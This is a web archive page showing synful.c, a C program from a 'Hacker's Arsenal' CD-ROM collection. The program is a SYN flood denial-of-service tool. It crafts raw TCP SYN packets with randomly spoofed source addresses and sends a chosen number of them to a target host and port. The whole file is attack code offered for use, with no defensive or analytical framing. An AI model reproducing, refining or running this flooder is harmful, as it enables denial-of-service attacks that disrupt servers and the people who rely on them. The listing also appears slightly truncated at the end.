home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / files / sin / synful.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-01-31  |  5.8 KB  |  207 lines
  1. /* synful.c - SYN (SYN/ACK and ACK blow) written by \\StOrM\\ */
  2.  
  3. #include <stdio.h>
  4. #include <stdlib.h>
  5. #include <signal.h>
  6. #include <string.h>
  7. #include <unistd.h>
  8. #include <netdb.h>
  9. #include <netinet/in.h>
  10. #include <sys/socket.h>
  11. #include <sys/time.h>
  12. #include <arpa/inet.h>
  13. #include <linux/ip.h>
  14. #include <linux/tcp.h>
  15.  
  16. void dosynpacket(unsigned int, unsigned int, unsigned short, unsigned short);
  17. unsigned short in_cksum(unsigned short *, int);
  18. unsigned int host2ip(char *);
  19.  
  20. main(int argc, char **argv)
  21. {
  22.    unsigned int srchost;
  23.    char tmpsrchost[12];
  24.    int i,s1,s2,s3,s4;
  25.    unsigned int dsthost;
  26.    unsigned short port=80;
  27.    unsigned short random_port;
  28.    unsigned int number=1000;  
  29.    printf("synful [It's so synful to send those spoofed SYN's]\n");
  30.    printf("Hacked out by \\\\StOrM\\\\\n\n");
  31.    if(argc < 2)
  32.    {
  33.       printf("syntax: synful targetIP\n", argv[0]);
  34.       exit(0);
  35.    }
  36.    initrand();
  37.    dsthost = host2ip(argv[1]);
  38.    if(argc >= 3) port = atoi(argv[2]);
  39.    if(argc >= 4) number = atoi(argv[3]);
  40.    if(port == 0) port = 80;
  41.    if(number == 0) number = 1000;
  42.    printf("Destination  : %s\n",argv[1]);
  43.    printf("Port         : %u\n",port);
  44.    printf("NumberOfTimes: %d\n\n", number);   
  45.    for(i=0;i < number;i++)
  46.    {
  47.       s1 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
  48.       s2 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
  49.       s3 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
  50.       s4 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
  51.       random_port = 1+(int) (10000.0*rand()/(RAND_MAX+1.0));
  52.       sprintf(tmpsrchost,"%d.%d.%d.%d",s1,s2,s3,s4);
  53.       printf("Being Synful to %s at port %u from %s port %u\n", argv[1], port, tmpsrchost, random_port);
  54.       srchost = host2ip(tmpsrchost);
  55.       dosynpacket(srchost, dsthost, port, random_port);
  56.    }
  57. }
  58.  
  59. void dosynpacket(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, unsigned short ran_port) {
  60.    struct send_tcp
  61.    {
  62.       struct iphdr ip;
  63.       struct tcphdr tcp;
  64.    } send_tcp;
  65.    struct pseudo_header
  66.    {
  67.       unsigned int source_address;
  68.       unsigned int dest_address;
  69.       unsigned char placeholder;
  70.       unsigned char protocol;
  71.       unsigned short tcp_length;
  72.       struct tcphdr tcp;
  73.    } pseudo_header;
  74.    int tcp_socket;
  75.    struct sockaddr_in sin;
  76.    int sinlen;
  77.             
  78.    /* form ip packet */
  79.    send_tcp.ip.ihl = 5;
  80.    send_tcp.ip.version = 4;
  81.    send_tcp.ip.tos = 0;
  82.    send_tcp.ip.tot_len = htons(40);
  83.    send_tcp.ip.id = ran_port;
  84.    send_tcp.ip.frag_off = 0;
  85.    send_tcp.ip.ttl = 255;
  86.    send_tcp.ip.protocol = IPPROTO_TCP;
  87.    send_tcp.ip.check = 0;
  88.    send_tcp.ip.saddr = source_addr;
  89.    send_tcp.ip.daddr = dest_addr;
  90.    
  91.    /* form tcp packet */
  92.    send_tcp.tcp.source = ran_port;
  93.    send_tcp.tcp.dest = htons(dest_port);
  94.    send_tcp.tcp.seq = ran_port;   
  95.    send_tcp.tcp.ack_seq = 0;
  96.    send_tcp.tcp.res1 = 0;
  97.    send_tcp.tcp.doff = 5;
  98.    send_tcp.tcp.fin = 0;
  99.    send_tcp.tcp.syn = 1;
  100.    send_tcp.tcp.rst = 0;
  101.    send_tcp.tcp.psh = 0;
  102.    send_tcp.tcp.ack = 0;
  103.    send_tcp.tcp.urg = 0;
  104.    send_tcp.tcp.res2 = 0;
  105.    send_tcp.tcp.window = htons(512);
  106.    send_tcp.tcp.check = 0;
  107.    send_tcp.tcp.urg_ptr = 0;
  108.    
  109.    /* setup the sin struct */
  110.    sin.sin_family = AF_INET;
  111.    sin.sin_port = send_tcp.tcp.source;
  112.    sin.sin_addr.s_addr = send_tcp.ip.daddr;   
  113.    
  114.    /* (try to) open the socket */
  115.    tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  116.    if(tcp_socket < 0)
  117.    {
  118.       perror("socket");
  119.       exit(1);
  120.    }
  121.    
  122.       /* set fields that need to be changed */
  123.       send_tcp.tcp.source++;
  124.       send_tcp.ip.id++;
  125.       send_tcp.tcp.seq++;
  126.       send_tcp.tcp.check = 0;
  127.       send_tcp.ip.check = 0;
  128.       
  129.       /* calculate the ip checksum */
  130.       send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  131.  
  132.       /* set the pseudo header fields */
  133.       pseudo_header.source_address = send_tcp.ip.saddr;
  134.       pseudo_header.dest_address = send_tcp.ip.daddr;
  135.       pseudo_header.placeholder = 0;
  136.       pseudo_header.protocol = IPPROTO_TCP;
  137.       pseudo_header.tcp_length = htons(20);
  138.       bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  139.       send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
  140.       sinlen = sizeof(sin);
  141.       sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
  142.    close(tcp_socket);
  143. }
  144.  
  145. unsigned short in_cksum(unsigned short *ptr, int nbytes)
  146. {
  147.     register long        sum;        /* assumes long == 32 bits */
  148.     u_short            oddbyte;
  149.     register u_short    answer;        /* assumes u_short == 16 bits */
  150.  
  151.     /*
  152.      * Our algorithm is simple, using a 32-bit accumulator (sum),
  153.      * we add sequential 16-bit words to it, and at the end, fold back
  154.      * all the carry bits from the top 16 bits into the lower 16 bits.
  155.      */
  156.  
  157.     sum = 0;
  158.     while (nbytes > 1)  {
  159.         sum += *ptr++;
  160.         nbytes -= 2;
  161.     }
  162.  
  163.                 /* mop up an odd byte, if necessary */
  164.     if (nbytes == 1) {
  165.         oddbyte = 0;        /* make sure top half is zero */
  166.         *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
  167.         sum += oddbyte;
  168.     }
  169.  
  170.     /*
  171.      * Add back carry outs from top 16 bits to low 16 bits.
  172.      */
  173.  
  174.     sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
  175.     sum += (sum >> 16);            /* add carry */
  176.     answer = ~sum;        /* ones-complement, then truncate to 16 bits */
  177.     return(answer);
  178. }
  179.  
  180. unsigned int host2ip(char *hostname)
  181. {
  182.    static struct in_addr i;
  183.    struct hostent *h;
  184.    i.s_addr = inet_addr(hostname);
  185.    if(i.s_addr == -1)
  186.    {
  187.       h = gethostbyname(hostname);
  188.       if(h == NULL)
  189.       {
  190.          fprintf(stderr, "cant find %s!\n", hostname);
  191.          exit(0);
  192.       }
  193.       bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  194.    }
  195.    return i.s_addr;
  196. }
  197.  
  198. void initrand(void)
  199. {
  200.   struct timeval tv;
  201.  
  202.   gettimeofday(&tv, (struct timezone *) NULL);
  203.   srand(tv.tv_usec);
  205.          
  206.  
  207.